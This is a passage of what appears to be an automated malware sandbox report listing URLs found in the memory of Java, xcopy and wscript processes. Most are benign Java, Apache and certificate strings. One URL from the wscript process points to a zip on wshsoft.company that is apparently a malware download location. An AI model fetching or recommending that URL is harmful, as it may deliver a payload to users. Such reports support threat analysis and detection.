        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolverti=
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
        Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSourceX
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespacex
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd/No
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
        Source: javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/3
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
        Source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://musicbrainz.org
        Source: javaw.exe, 00000006.00000002.2853953769.0000000015570000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A104000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000544E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852184942.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723167720.0000000015C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
        Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 
xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 
xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009F78000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A579000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 
xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 
xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.org/licenses/bsd-license.php
        Source: wscript.exe, 00000005.00000003.1667383984.0000000006E96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1656110679.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1661002252.0000000006894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1665048799.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.1676383975.00000000005F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://wshsoft.company/jv/jrex.zip
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
        Source: xcopy.exe, 00000015.00000003.1745226975.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 
xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ibm.com.
        Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lotus.com.
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
        Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
